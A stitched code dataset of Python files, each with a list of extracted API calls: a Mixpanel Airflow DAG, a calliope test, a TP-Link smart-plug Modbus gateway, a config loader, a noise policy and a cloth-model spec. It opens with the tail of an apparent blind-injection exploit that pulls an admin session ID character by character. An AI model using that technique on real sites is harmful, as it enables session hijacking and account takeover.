print('An admin session is available !')
# Fetch it
sid = self.word(
'Session ID',
query % 'session_id',
charset=string.ascii_lowercase + string.digits,
size=26
)
print('Session ID: %s' % sid)
return sid
run(sys.argv[1])
|
[
"requests.packages.urllib3.disable_warnings",
"requests.Session",
"string.encode",
"random.choice"
] |
[((614, 689), 'requests.packages.urllib3.disable_warnings', 'requests.packages.urllib3.disable_warnings', ([], {'category': 'InsecureRequestWarning'}), '(category=InsecureRequestWarning)\n', (656, 689), False, 'import requests\n'), ((1199, 1217), 'requests.Session', 'requests.Session', ([], {}), '()\n', (1215, 1217), False, 'import requests\n'), ((927, 962), 'random.choice', 'random.choice', (['string.ascii_letters'], {}), '(string.ascii_letters)\n', (940, 962), False, 'import random\n'), ((1526, 1541), 'string.encode', 'string.encode', ([], {}), '()\n', (1539, 1541), False, 'import string\n')]
|
import os
import tempfile
import numpy as np
import pytest
import calliope
def verify_solution_integrity(model_solution, solution_from_disk, tempdir):
# Check whether the two are the same
    assert np.allclose(model_solution['e_cap'], solution_from_disk['e_cap'])
# Check that config AttrDict has been deserialized
assert(solution_from_disk.attrs['config_run'].output.path == tempdir)
class TestSave:
@pytest.fixture(scope='module')
def model(self):
model = calliope.Model()
model.run()
return model
def test_save_netcdf(self, model):
with tempfile.TemporaryDirectory() as tempdir:
model.config_run.set_key('output.path', tempdir)
model.save_solution('netcdf')
# Try reading solution back in
sol_file = os.path.join(tempdir, 'solution.nc')
solution_from_disk = calliope.read.read_netcdf(sol_file)
solution_from_disk.close() # so that temp dir can be deleted
verify_solution_integrity(model.solution, solution_from_disk, tempdir)
def test_save_csv(self, model):
with tempfile.TemporaryDirectory() as tempdir:
model.config_run.set_key('output.path', tempdir)
model.save_solution('csv')
# Try reading solution back in
solution_from_disk = calliope.read.read_csv(tempdir)
verify_solution_integrity(model.solution, solution_from_disk, tempdir)
|
[
"tempfile.TemporaryDirectory",
"calliope.read.read_netcdf",
"numpy.allclose",
"pytest.fixture",
"calliope.read.read_csv",
"calliope.Model",
"os.path.join"
] |
[((208, 273), 'numpy.allclose', 'np.allclose', (["model_solution['e_cap']", "solution_from_disk['e_cap']"], {}), "(model_solution['e_cap'], solution_from_disk['e_cap'])\n", (219, 273), True, 'import numpy as np\n'), ((435, 465), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (449, 465), False, 'import pytest\n'), ((503, 519), 'calliope.Model', 'calliope.Model', ([], {}), '()\n', (517, 519), False, 'import calliope\n'), ((614, 643), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ([], {}), '()\n', (641, 643), False, 'import tempfile\n'), ((826, 862), 'os.path.join', 'os.path.join', (['tempdir', '"""solution.nc"""'], {}), "(tempdir, 'solution.nc')\n", (838, 862), False, 'import os\n'), ((896, 931), 'calliope.read.read_netcdf', 'calliope.read.read_netcdf', (['sol_file'], {}), '(sol_file)\n', (921, 931), False, 'import calliope\n'), ((1136, 1165), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ([], {}), '()\n', (1163, 1165), False, 'import tempfile\n'), ((1355, 1386), 'calliope.read.read_csv', 'calliope.read.read_csv', (['tempdir'], {}), '(tempdir)\n', (1377, 1386), False, 'import calliope\n')]
|
import datetime
import io
import gzip
import json
import time
from airflow import DAG
from airflow.contrib.operators.aws_athena_operator import AWSAthenaOperator
from airflow.hooks.S3_hook import S3Hook
from airflow.operators.python_operator import PythonOperator
from airflow.models import Variable
import pytz
import requests
import yaml
from jinja2 import PackageLoader
import pkg_resources
from kite_airflow.slack_alerts import task_fail_slack_alert
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': datetime.datetime(2020, 1, 1),
'email_on_failure': False,
'email_on_retry': False,
'retries': 1,
'retry_delay': datetime.timedelta(minutes=5),
'on_failure_callback': task_fail_slack_alert,
}
dag = DAG(
'mixpanel_ingest',
default_args=default_args,
description='Mixpanel data ingest DAG.',
schedule_interval='10 4 * * *',
max_active_runs=1,
jinja_environment_kwargs={
'loader': PackageLoader('kite_airflow', 'templates')
},
)
pacific = pytz.timezone('America/Los_Angeles')
people_schema = yaml.load(pkg_resources.resource_stream('kite_airflow', 'files/mixpanel_people.schema.yaml'), Loader=yaml.FullLoader)
def copy_profile_deltas(task_instance, execution_date, prev_execution_date_success, next_execution_date, **context):
ex_day = execution_date.replace(hour=0, minute=0, second=0, microsecond=0)
if prev_execution_date_success:
ex_day = prev_execution_date_success.replace(hour=0, minute=0, second=0, microsecond=0) + datetime.timedelta(days=1)
next_ex_day = next_execution_date.replace(hour=0, minute=0, second=0, microsecond=0)
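    # Break the [ex_day, next_ex_day) window into 4-hour chunks; one JQL people query is issued per chunk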
chunks = [ex_day]
while chunks[-1] < next_ex_day:
chunks.append(chunks[-1] + datetime.timedelta(hours=4))
gz_file = io.BytesIO()
with gzip.GzipFile(fileobj=gz_file, mode="w") as f:
start_date = chunks.pop(0)
for chunk in chunks:
filters = []
for cmp, dt in [['>=', start_date], ['<', chunk]]:
filters.append('user.time {} {}'.format(cmp, 1000 * int(time.mktime(dt.astimezone(pacific).timetuple()))))
start_date = chunk
print(filters)
script = 'function main() {{ return People().filter(function(user) {{ return {}; }})}}'.format(' && '.join(filters))
res = requests.post('https://mixpanel.com/api/2.0/jql',
auth=(Variable.get('mixpanel_credentials', deserialize_json=True)['secret'], ''),
data={'script': script})
if res.status_code != 200:
raise Exception(res.text)
for line in res.json():
to_scrub = [line]
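                # Walk the nested profile dict: drop empty dict/list values and strip Mixpanel's '$' prefix from keys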
while to_scrub:
curr = to_scrub.pop(0)
for key, value in list(curr.items()):
if isinstance(value, (dict, list)) and len(value) == 0:
del curr[key]
if isinstance(value, dict):
to_scrub.append(value)
if key.startswith('$'):
curr[key[1:]] = value
del curr[key]
for ts_field in ['last_seen', 'time']:
pacific_ts = datetime.datetime.fromtimestamp(line[ts_field] / 1000).replace(tzinfo=pacific)
line[ts_field] = int(time.mktime(pacific_ts.astimezone(pytz.utc).timetuple()))
f.write(json.dumps(line).encode('utf8'))
f.write(b'\n')
s3 = S3Hook('aws_us_east_1')
key = 'mixpanel/people/raw/year={}/month={}/day={}/deltas.json.gz'.format(
execution_date.year, execution_date.month, execution_date.day
)
s3.load_bytes(gz_file.getvalue(), key, 'kite-metrics')
PythonOperator(
python_callable=copy_profile_deltas,
task_id=copy_profile_deltas.__name__,
dag=dag,
retries=2,
provide_context=True,
) >> AWSAthenaOperator(
aws_conn_id='aws_us_east_1',
task_id='rollup_people',
query='athena/queries/mixpanel_people_rollup.tmpl.sql',
output_location='s3://kite-metrics-test/athena-results/ddl',
database='kite_metrics',
dag=dag,
params={'schema': people_schema},
) >> AWSAthenaOperator(
aws_conn_id='aws_us_east_1',
task_id='cleanup_rollup_table',
query="DROP TABLE mixpanel_people_rollup_{{ds_nodash}}",
output_location='s3://kite-metrics-test/athena-results/ddl',
database='kite_metrics',
dag=dag,
params={'schema': people_schema},
) >> AWSAthenaOperator(
aws_conn_id='aws_us_east_1',
task_id='update_people_table_location',
query="""ALTER TABLE mixpanel_people
SET LOCATION 's3://kite-metrics/mixpanel/people/rollups/year={{execution_date.year}}/month={{execution_date.month}}/day={{execution_date.day}}/'""",
output_location='s3://kite-metrics-test/athena-results/ddl',
database='kite_metrics',
dag=dag,
params={'schema': people_schema},
)
ddl_dag = DAG(
'mixpanel_ingest_schema_update',
default_args=default_args,
description='Mixpanel data schema definition.',
schedule_interval=None,
max_active_runs=1,
)
for table_name, s3_prefix in {'mixpanel_people_raw': 'mixpanel/people/raw', 'mixpanel_people': 'mixpanel/people/rollups'}.items():
AWSAthenaOperator(
aws_conn_id='aws_us_east_1',
task_id='drop_{}'.format(table_name),
query='DROP TABLE {{params.table_name}}',
output_location='s3://kite-metrics-test/athena-results/ddl',
database='kite_metrics',
dag=ddl_dag,
params={'table_name': table_name},
) >> AWSAthenaOperator(
aws_conn_id='aws_us_east_1',
task_id='create_{}'.format(table_name),
query='athena/tables/mixpanel_people.tmpl.sql',
output_location='s3://kite-metrics-test/athena-results/ddl',
database='kite_metrics',
dag=ddl_dag,
params={
'schema': people_schema,
'table_name': table_name,
's3_prefix': s3_prefix,
'partitioned': table_name == 'mixpanel_people_raw',
'json': table_name == 'mixpanel_people_raw',
}
)
|
[
"io.BytesIO",
"airflow.hooks.S3_hook.S3Hook",
"airflow.DAG",
"airflow.operators.python_operator.PythonOperator",
"pkg_resources.resource_stream",
"airflow.contrib.operators.aws_athena_operator.AWSAthenaOperator",
"airflow.models.Variable.get",
"datetime.datetime",
"json.dumps",
"jinja2.PackageLoader",
"datetime.timedelta",
"pytz.timezone",
"gzip.GzipFile",
"datetime.datetime.fromtimestamp"
] |
[((1040, 1076), 'pytz.timezone', 'pytz.timezone', (['"""America/Los_Angeles"""'], {}), "('America/Los_Angeles')\n", (1053, 1076), False, 'import pytz\n'), ((5017, 5180), 'airflow.DAG', 'DAG', (['"""mixpanel_ingest_schema_update"""'], {'default_args': 'default_args', 'description': '"""Mixpanel data schema definition."""', 'schedule_interval': 'None', 'max_active_runs': '(1)'}), "('mixpanel_ingest_schema_update', default_args=default_args, description\n ='Mixpanel data schema definition.', schedule_interval=None,\n max_active_runs=1)\n", (5020, 5180), False, 'from airflow import DAG\n'), ((546, 575), 'datetime.datetime', 'datetime.datetime', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (563, 575), False, 'import datetime\n'), ((674, 703), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(5)'}), '(minutes=5)\n', (692, 703), False, 'import datetime\n'), ((1103, 1189), 'pkg_resources.resource_stream', 'pkg_resources.resource_stream', (['"""kite_airflow"""', '"""files/mixpanel_people.schema.yaml"""'], {}), "('kite_airflow',\n 'files/mixpanel_people.schema.yaml')\n", (1132, 1189), False, 'import pkg_resources\n'), ((1799, 1811), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\n', (1809, 1811), False, 'import io\n'), ((3586, 3609), 'airflow.hooks.S3_hook.S3Hook', 'S3Hook', (['"""aws_us_east_1"""'], {}), "('aws_us_east_1')\n", (3592, 3609), False, 'from airflow.hooks.S3_hook import S3Hook\n'), ((4572, 4993), 'airflow.contrib.operators.aws_athena_operator.AWSAthenaOperator', 'AWSAthenaOperator', ([], {'aws_conn_id': '"""aws_us_east_1"""', 'task_id': '"""update_people_table_location"""', 'query': '"""ALTER TABLE mixpanel_people\nSET LOCATION \'s3://kite-metrics/mixpanel/people/rollups/year={{execution_date.year}}/month={{execution_date.month}}/day={{execution_date.day}}/\'"""', 'output_location': '"""s3://kite-metrics-test/athena-results/ddl"""', 'database': '"""kite_metrics"""', 'dag': 'dag', 'params': "{'schema': people_schema}"}), '(aws_conn_id=\'aws_us_east_1\', task_id=\n \'update_people_table_location\', query=\n """ALTER TABLE mixpanel_people\nSET LOCATION \'s3://kite-metrics/mixpanel/people/rollups/year={{execution_date.year}}/month={{execution_date.month}}/day={{execution_date.day}}/\'"""\n , output_location=\'s3://kite-metrics-test/athena-results/ddl\', database\n =\'kite_metrics\', dag=dag, params={\'schema\': people_schema})\n', (4589, 4993), False, 'from airflow.contrib.operators.aws_athena_operator import AWSAthenaOperator\n'), ((1822, 1862), 'gzip.GzipFile', 'gzip.GzipFile', ([], {'fileobj': 'gz_file', 'mode': '"""w"""'}), "(fileobj=gz_file, mode='w')\n", (1835, 1862), False, 'import gzip\n'), ((4273, 4556), 'airflow.contrib.operators.aws_athena_operator.AWSAthenaOperator', 'AWSAthenaOperator', ([], {'aws_conn_id': '"""aws_us_east_1"""', 'task_id': '"""cleanup_rollup_table"""', 'query': '"""DROP TABLE mixpanel_people_rollup_{{ds_nodash}}"""', 'output_location': '"""s3://kite-metrics-test/athena-results/ddl"""', 'database': '"""kite_metrics"""', 'dag': 'dag', 'params': "{'schema': people_schema}"}), "(aws_conn_id='aws_us_east_1', task_id=\n 'cleanup_rollup_table', query=\n 'DROP TABLE mixpanel_people_rollup_{{ds_nodash}}', output_location=\n 's3://kite-metrics-test/athena-results/ddl', database='kite_metrics',\n dag=dag, params={'schema': people_schema})\n", (4290, 4556), False, 'from airflow.contrib.operators.aws_athena_operator import AWSAthenaOperator\n'), ((976, 1018), 'jinja2.PackageLoader', 'PackageLoader', (['"""kite_airflow"""', '"""templates"""'], {}), "('kite_airflow', 'templates')\n", (989, 1018), False, 'from jinja2 import PackageLoader\n'), ((1544, 1570), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(1)'}), '(days=1)\n', (1562, 1570), False, 'import datetime\n'), ((3824, 3960), 'airflow.operators.python_operator.PythonOperator', 'PythonOperator', ([], {'python_callable': 'copy_profile_deltas', 'task_id': 'copy_profile_deltas.__name__', 'dag': 'dag', 'retries': '(2)', 'provide_context': '(True)'}), '(python_callable=copy_profile_deltas, task_id=\n copy_profile_deltas.__name__, dag=dag, retries=2, provide_context=True)\n', (3838, 3960), False, 'from airflow.operators.python_operator import PythonOperator\n'), ((3982, 4251), 'airflow.contrib.operators.aws_athena_operator.AWSAthenaOperator', 'AWSAthenaOperator', ([], {'aws_conn_id': '"""aws_us_east_1"""', 'task_id': '"""rollup_people"""', 'query': '"""athena/queries/mixpanel_people_rollup.tmpl.sql"""', 'output_location': '"""s3://kite-metrics-test/athena-results/ddl"""', 'database': '"""kite_metrics"""', 'dag': 'dag', 'params': "{'schema': people_schema}"}), "(aws_conn_id='aws_us_east_1', task_id='rollup_people',\n query='athena/queries/mixpanel_people_rollup.tmpl.sql', output_location\n ='s3://kite-metrics-test/athena-results/ddl', database='kite_metrics',\n dag=dag, params={'schema': people_schema})\n", (3999, 4251), False, 'from airflow.contrib.operators.aws_athena_operator import AWSAthenaOperator\n'), ((1755, 1782), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(4)'}), '(hours=4)\n', (1773, 1782), False, 'import datetime\n'), ((2437, 2496), 'airflow.models.Variable.get', 'Variable.get', (['"""mixpanel_credentials"""'], {'deserialize_json': '(True)'}), "('mixpanel_credentials', deserialize_json=True)\n", (2449, 2496), False, 'from airflow.models import Variable\n'), ((3309, 3363), 'datetime.datetime.fromtimestamp', 'datetime.datetime.fromtimestamp', (['(line[ts_field] / 1000)'], {}), '(line[ts_field] / 1000)\n', (3340, 3363), False, 'import datetime\n'), ((3512, 3528), 'json.dumps', 'json.dumps', (['line'], {}), '(line)\n', (3522, 3528), False, 'import json\n')]
|
#! /usr/bin/python3
#
# @(!--#) @(#) modbusgwudp.py, version 003, 02-july-2018
#
# modbus gateway over UDP for a TP-Link HS100/HS110 Smart WiFi Plug
#
# Links
#
# https://www.softscheck.com/en/reverse-engineering-tp-link-hs110/
# https://github.com/softScheck/tplink-smartplug
# https://github.com/softScheck/tplink-smartplug/blob/master/tplink-smartplug.py
# https://unserver.xyz/modbus-guide/
#
#
# imports
#
import sys
import os
import argparse
import socket
########################################################################
DEFAULT_MODBUS_PORT = "8502"
MAX_PACKET_LENGTH = 1024
GETSYSINFO = '{"system":{"get_sysinfo":{}}}'
SETRELAYON = '{"system":{"set_relay_state":{"state":1}}}'
SETRELAYOFF = '{"system":{"set_relay_state":{"state":0}}}'
########################################################################
def showpacket(bytes):
bpr = 16 # bpr is Bytes Per Row
numbytes = len(bytes)
if numbytes == 0:
print("<empty frame>")
else:
i = 0
while i < numbytes:
if (i % bpr) == 0:
print("{:04d} :".format(i), sep='', end='')
print(" {:02X}".format(bytes[i]), sep='', end='')
if ((i + 1) % bpr) == 0:
print()
i = i + 1
if (numbytes % bpr) != 0:
print()
return
########################################################################
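# TP-Link smart plugs obfuscate their JSON payloads with an XOR "autokey" cipher:
# each plaintext byte is XORed with the previous ciphertext byte, seeded with 171.
# The first 4 bytes of the result are left zeroed in place of the length header.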
def encrypt(barray):
key = 171
result = bytearray(len(barray) + 4)
i = 4
for b in barray:
a = key ^ b
key = a
result[i] = a
i += 1
return result
########################################################################
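# Inverse of encrypt(): XOR each byte with the previous ciphertext byte, again
# seeded with 171; the caller strips the 4-byte header before calling this.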
def decrypt(barray):
key = 171
result = bytearray(len(barray))
i = 0
for b in barray:
a = key ^ b
key = b
result[i] = a
i += 1
return result
########################################################################
def runplugcommand(ipaddr, command):
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp.connect((ipaddr, 9999))
tcp.send(encrypt(bytearray(command, 'utf-8')))
plugdata = tcp.recv(MAX_PACKET_LENGTH)
tcp.close()
return(decrypt(plugdata[4:]))
########################################################################
def getrelaystatus(ipaddr):
    sysinfo = runplugcommand(ipaddr, GETSYSINFO)
if bytearray('","relay_state":0,', 'utf-8') in sysinfo:
return 0
elif bytearray('","relay_state":1,', 'utf-8') in sysinfo:
return 1
else:
return None
########################################################################
def setrelaystatus(ipaddr, status):
if status == 0:
cmd = SETRELAYOFF
else:
cmd = SETRELAYON
errcode = runplugcommand(ipaddr, cmd)
########################################################################
#
# Main
#
progname = os.path.basename(sys.argv[0])
parser = argparse.ArgumentParser()
parser.add_argument("--ipaddr", help="IP address of the HS100/HS110 plug")
parser.add_argument("--port", help="port number to listen on", default=DEFAULT_MODBUS_PORT)
args = parser.parse_args()
ipaddr = args.ipaddr
port = int(args.port)
print("====== {} === HS100/110 IP address: {} === Modbus Port: {} ======".format(progname, ipaddr, port))
udp = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
udp.bind(('', port))
while True:
print("Waiting to receive incoming Modbus packet over UDP")
try:
databytes, clientaddress = udp.recvfrom(MAX_PACKET_LENGTH)
except ConnectionResetError:
print("{}: got a ConnectionResetError - ignoring".format(progname), file=sys.stderr)
continue
if len(databytes) < 6:
print("{}: runt Modbus UDP packet received - ignoring".format(progname), file=sys.stderr)
showpacket(databytes)
continue
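    # Modbus/TCP MBAP header: bytes 0-1 transaction ID, 2-3 protocol ID, 4-5 length; byte 6 is the unit ID and byte 7 the function code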
packetlength = (databytes[4] * 256) + databytes[5]
if (packetlength < 2):
print("{}: Modbus UDP packet length too short to have any useful data in it - ignoring".format(progname), file=sys.stderr)
showpacket(databytes)
continue
if (packetlength + 6) != len(databytes):
print("{}: Modbus UDP packet has incorrect length - ignoring".format(progname), file=sys.stderr)
showpacket(databytes)
continue
unitid = databytes[6]
if unitid != 1:
print("{}: this gateway only serves Modbus UDP packets with Unit ID of 1 - ignoring".format(progname), file=sys.stderr)
showpacket(databytes)
continue
functioncode = databytes[7]
if functioncode == 1:
# read coil
print("Function code 0x01 - read single coil")
showpacket(databytes)
if packetlength != 6:
print("{}: incorrect packet length for function code 0x01 - ignoring".format(progname), file=sys.stderr)
continue
addr = (databytes[8] * 256) + databytes[9]
if (addr != 0):
print("{}: this gateway only serves Modbus UDP packets with address of 0 - ignoring".format(progname), file=sys.stderr)
continue
numr = (databytes[10] * 256) + databytes[11]
if (numr != 1):
print("{}: this gateway only serves Modbus UDP packets with register count of 1 - ignoring".format(progname), file=sys.stderr)
continue
relay = getrelaystatus(ipaddr)
response = bytearray(6 + 4)
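        # Echo the transaction/protocol IDs and set length to 4 (unit ID + function code + byte count + coil byte)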
response[0:3] = databytes[0:3]
response[4] = 0
response[5] = 4
response[6] = 1
response[7] = 1
response[8] = 1
response[9] = relay
print("Sending response:")
showpacket(response)
udp.sendto(response, clientaddress)
continue
if functioncode == 5:
# write coil
print("Function code 0x05 - write single coil")
showpacket(databytes)
if packetlength != 6:
print("{}: incorrect packet length for function code 0x06 - ignoring".format(progname), file=sys.stderr)
showpacket(databytes)
continue
addr = (databytes[8] * 256) + databytes[9]
if (addr != 0):
print("{}: this gateway only serves Modbus UDP packets with address of 0 - ignoring".format(progname), file=sys.stderr)
continue
stat = (databytes[10] * 256) + databytes[11]
if ((stat != 0) and (stat != 0xFF00)):
print("{}: this gateway only serves Modbus UDP packets with register count of 1 - ignoring".format(progname), file=sys.stderr)
continue
setrelaystatus(ipaddr, stat)
response = bytearray(len(databytes))
response[0:12] = databytes[0:12]
print("Sending response:")
showpacket(response)
udp.sendto(response, clientaddress)
continue
print("{}: unrecognised or unsupported packet".format(progname), file=sys.stderr)
showpacket(databytes)
########################################################################
# end of file
|
[
"socket.socket",
"argparse.ArgumentParser",
"os.path.basename"
] |
[((2945, 2974), 'os.path.basename', 'os.path.basename', (['sys.argv[0]'], {}), '(sys.argv[0])\n', (2961, 2974), False, 'import os\n'), ((2985, 3010), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (3008, 3010), False, 'import argparse\n'), ((3363, 3423), 'socket.socket', 'socket.socket', ([], {'family': 'socket.AF_INET', 'type': 'socket.SOCK_DGRAM'}), '(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n', (3376, 3423), False, 'import socket\n'), ((2021, 2070), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (2034, 2070), False, 'import socket\n')]
|
#!/usr/bin/env python3
# SPDX-License-Identifier: MIT
# Copyright (c) 2016-2020 <NAME>, <NAME>, <NAME>, <NAME>
import sys
import os
import json
class Config:
fnp = os.path.join(os.path.dirname(os.path.realpath(__file__)), "../config.json")
if not os.path.exists(fnp):
print("ERROR: file not found:", fnp)
print("\tfile should be symlink'd to a desired config.<blah>.json file")
sys.exit(1)
with open(fnp) as f:
c = json.load(f)
re = c["RE"]
partial_assemblies = re["partial_assemblies"] if "partial_assemblies" in re else []
version = re["version"]
db_host = re["db_host"]
db_usr = re["db_usr"]
db_port = re["db_port"]
db = re["db"]
assemblies = re["assemblies"]
minipeaks_ver = re["minipeaks_ver"]
minipeaks_nbins = re["minipeaks_nbins"]
ribbon = re["ribbon"]
GoogleAnalytics = re["googleAnalytics"]
memcache = re["memcache"]
cassandra = re["cassandra"]
redisHost = re["redisHost"]
bedupload = c["bedupload"]
downloadDir = re["downloadDir"]
rnaSeqIsNorm = re["rnaSeqIsNorm"]
#peakIntersectionRunDate = re["peakIntersectionRunDate"]
#cistromePeakIntersectionRunDate = re["cistromePeakIntersectionRunDate"]
|
[
"os.path.realpath",
"json.load",
"os.path.exists",
"sys.exit"
] |
[((261, 280), 'os.path.exists', 'os.path.exists', (['fnp'], {}), '(fnp)\n', (275, 280), False, 'import os\n'), ((416, 427), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (424, 427), False, 'import sys\n'), ((466, 478), 'json.load', 'json.load', (['f'], {}), '(f)\n', (475, 478), False, 'import json\n'), ((203, 229), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (219, 229), False, 'import os\n')]
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Gaussian noise policy."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from caql import policy
class GaussianNoisePolicy(policy.BasePolicy):
"""Implementation for gaussian noise policy."""
def __init__(self, greedy_policy, sigma, sigma_decay, sigma_min):
"""Creates an epsilon greedy policy.
Args:
greedy_policy: policy.BasePolicy. The policy that is used to compute a
greedy action.
sigma: float. Standard deviation for a gaussian distribution.
sigma_decay: float. Decay rate for the sigma.
sigma_min: float. The minimum value of the sigma.
"""
if not 0 <= sigma <= 1.0:
raise ValueError('sigma should be in [0.0, 1.0]')
self._greedy_policy = greedy_policy
self._sigma = sigma
self._sigma_decay = sigma_decay
self._sigma_min = sigma_min
@property
def sigma(self):
return self._sigma
def _action(self, state, use_action_function, batch_mode=False):
mean_action = self._greedy_policy.action(state, use_action_function,
batch_mode)
if mean_action is None:
return None
batch_action_dim = np.shape(mean_action)
# Match the scale of noise value to action value.
noise_exploration = (
self._sigma * self._greedy_policy.action_spec.maximum *
np.random.randn(*batch_action_dim))
return mean_action + noise_exploration
def _update_params(self):
self._sigma = max(self._sigma * self._sigma_decay, self._sigma_min)
def _params_debug_str(self):
return 'sigma: %.3f' % self._sigma
|
[
"numpy.shape",
"numpy.random.randn"
] |
[((1836, 1857), 'numpy.shape', 'np.shape', (['mean_action'], {}), '(mean_action)\n', (1844, 1857), True, 'import numpy as np\n'), ((2010, 2044), 'numpy.random.randn', 'np.random.randn', (['*batch_action_dim'], {}), '(*batch_action_dim)\n', (2025, 2044), True, 'import numpy as np\n')]
|
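The GaussianNoisePolicy record above adds exploration noise scaled by sigma times the action-space maximum and decays sigma toward a floor after each update. A minimal self-contained sketch of that schedule, outside the class; the action_max bound and the zero greedy action are illustrative stand-ins, not part of the original code:

import numpy as np

def gaussian_exploration(greedy_action, sigma, action_max):
    # Zero-mean Gaussian noise matched to the action shape and scaled to the action range.
    noise = sigma * action_max * np.random.randn(*np.shape(greedy_action))
    return greedy_action + noise

sigma, sigma_decay, sigma_min = 0.3, 0.99, 0.01
action = np.zeros(2)  # stand-in for the greedy policy output
for _ in range(3):
    noisy = gaussian_exploration(action, sigma, action_max=1.0)
    sigma = max(sigma * sigma_decay, sigma_min)  # same decay rule as _update_params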
from ModelSpecification import NodeFormat, EdgeFormat, GlobalFormat, PositionFrame, \
GraphAttributeFormat, GraphNetStructure, ModelSpecification, ClothKeypoints, TrainingParams, LossFunction
# Define a model specification which can be instantiated
def specify_input_graph_format() -> GraphAttributeFormat:
return GraphAttributeFormat(
node_format=NodeFormat.XYZR_FixedFlag,
edge_format=EdgeFormat.DiffXYZ_ConnectionFlag,
global_format=GlobalFormat.NextEndEffectorXYZR,
)
def specify_position_output_graph_format() -> GraphAttributeFormat:
return GraphAttributeFormat(
node_format=NodeFormat.XYZ,
edge_format=EdgeFormat.DiffXYZ,
global_format=GlobalFormat.Dummy
)
def specify_has_moved_output_graph_format() -> GraphAttributeFormat:
return GraphAttributeFormat(
node_format=NodeFormat.HasMovedClasses,
edge_format=EdgeFormat.Dummy,
global_format=GlobalFormat.Dummy
)
def specify_cloth_keypoints_for_bag() -> ClothKeypoints:
return ClothKeypoints(
keypoint_indices=[
# Front
4, 127, 351, 380, 395, 557, 535, 550, 756, 783, 818, 1258,
# Back
150, 67, 420, 436, 920, 952, 1069, 1147, 1125, 1099, 929, 464,
# Left
142, 851, 1178,
# Right
49, 509, 1000,
# Bottom
641
],
keypoint_edges=[
# Front edges
(4, 351), (4, 1258),
(351, 380), (351, 818),
(380, 395), (380, 783),
(395, 756),
(127, 557), (127, 1258),
(557, 818), (557, 535),
(535, 783), (535, 550),
(550, 756),
(783, 818),
(818, 1258),
# Back edges
(436, 1069), (436, 420),
(1069, 952),
(952, 920),
(420, 1099), (420, 464),
(1099, 920), (1099, 1125),
(920, 929),
(464, 1125), (464, 67),
(1125, 929), (1125, 1147),
(67, 1147),
(150, 1147), (150, 929),
# Left edges
(920, 1178),
(1178, 535), (1178, 851),
(150, 142),
(851, 557), (851, 142), (851, 929),
(142, 127),
# Right edges
(509, 380), (509, 420), (509, 1000),
(1000, 351), (1000, 464), (1000, 49),
(49, 4), (49, 67),
# Bottom edges
(641, 127), (641, 4),
(641, 67), (641, 150),
],
fixed_keypoint_indices=[395, 550, 756, 436, 952, 1069]
)
def specify_graph_net_structure() -> GraphNetStructure:
return GraphNetStructure(
encoder_node_layers=[64, 64],
encoder_edge_layers=[64, 64],
encoder_global_layers=[128],
core_node_layers=[128, 64],
core_edge_layers=[128, 64],
core_global_layers=[128],
num_processing_steps=5,
)
def specify_training_params() -> TrainingParams:
return TrainingParams(
frame_step=1,
movement_threshold=0.001,
batch_size=32,
)
def specify_motion_model(name: str) -> ModelSpecification:
return ModelSpecification(
name=name,
input_graph_format=specify_input_graph_format(),
output_graph_format=specify_position_output_graph_format(),
position_frame=PositionFrame.LocalToEndEffector,
graph_net_structure=specify_graph_net_structure(),
loss_function=LossFunction.MeanSquaredError_Position_NodesOnly,
cloth_keypoints=specify_cloth_keypoints_for_bag(),
training_params=specify_training_params(),
)
def specify_has_moved_model(name: str) -> ModelSpecification:
return ModelSpecification(
name=name,
input_graph_format=specify_input_graph_format(),
output_graph_format=specify_has_moved_output_graph_format(),
position_frame=PositionFrame.LocalToEndEffector,
graph_net_structure=specify_graph_net_structure(),
loss_function=LossFunction.CrossEntropy,
cloth_keypoints=specify_cloth_keypoints_for_bag(),
training_params=specify_training_params(),
)
|
[
"ModelSpecification.TrainingParams",
"ModelSpecification.ClothKeypoints",
"ModelSpecification.GraphAttributeFormat",
"ModelSpecification.GraphNetStructure"
] |
[((325, 489), 'ModelSpecification.GraphAttributeFormat', 'GraphAttributeFormat', ([], {'node_format': 'NodeFormat.XYZR_FixedFlag', 'edge_format': 'EdgeFormat.DiffXYZ_ConnectionFlag', 'global_format': 'GlobalFormat.NextEndEffectorXYZR'}), '(node_format=NodeFormat.XYZR_FixedFlag, edge_format=\n EdgeFormat.DiffXYZ_ConnectionFlag, global_format=GlobalFormat.\n NextEndEffectorXYZR)\n', (345, 489), False, 'from ModelSpecification import NodeFormat, EdgeFormat, GlobalFormat, PositionFrame, GraphAttributeFormat, GraphNetStructure, ModelSpecification, ClothKeypoints, TrainingParams, LossFunction\n'), ((592, 711), 'ModelSpecification.GraphAttributeFormat', 'GraphAttributeFormat', ([], {'node_format': 'NodeFormat.XYZ', 'edge_format': 'EdgeFormat.DiffXYZ', 'global_format': 'GlobalFormat.Dummy'}), '(node_format=NodeFormat.XYZ, edge_format=EdgeFormat.\n DiffXYZ, global_format=GlobalFormat.Dummy)\n', (612, 711), False, 'from ModelSpecification import NodeFormat, EdgeFormat, GlobalFormat, PositionFrame, GraphAttributeFormat, GraphNetStructure, ModelSpecification, ClothKeypoints, 